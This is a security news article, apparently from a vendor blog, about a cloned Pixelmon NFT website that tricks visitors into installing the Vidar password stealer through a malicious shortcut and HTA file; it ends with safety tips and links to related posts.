Scam Pixelmon NFT Website Hosts Password-stealing Malware
A fraudulent website mimicking popular Pixelmon NFT lures its visitors with promises of free collectibles and tokens only to have them download and install password-stealing malware.
Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200 thousand followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.
In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.
However, instead of providing visitors with links to a game's demo version, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. Users would need to download a malicious archive that packs a Windows shortcut to be compromised.
Upon accessing the Windows shortcut (setup.lnk), the potential victims trigger the execution of a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file retrieves a password-stealing malware called Vidar spotted in similar attacks in the past.
Running Vidar establishes a connection to a Telegram channel, retrieves a C2's IP address, then downloads additional configuration files and modules to steal data from compromised systems. Vidar can search for relevant files on infected devices, exfiltrate them to the threat actor's defined address, and steal passwords from apps and browsers.
This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect visitors to have cryptocurrency wallets installed on their systems.
To steer clear of this type of attack, users should always pay attention to the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.
How to monitor your online privacy during your Thanksgiving trip
November 22, 2022
Just your yearly dose of Black Friday spam: Cybercrooks get ahead of the game to steal shoppers’ info
November 16, 2022
Bitdefender VPN in 2022: the new, the improved, and the soon-to-be
November 14, 2022
August Spam Debrief: Bitdefender Labs Warns of Fraud Campaigns Exploiting the Russia-Ukraine War
August 31, 2022
Snake Keylogger Returns in Malspam Campaign Disguised as Business Portfolio from IT Vendor
August 30, 2022
What is medical identity theft and how to protect against it
July 27, 2022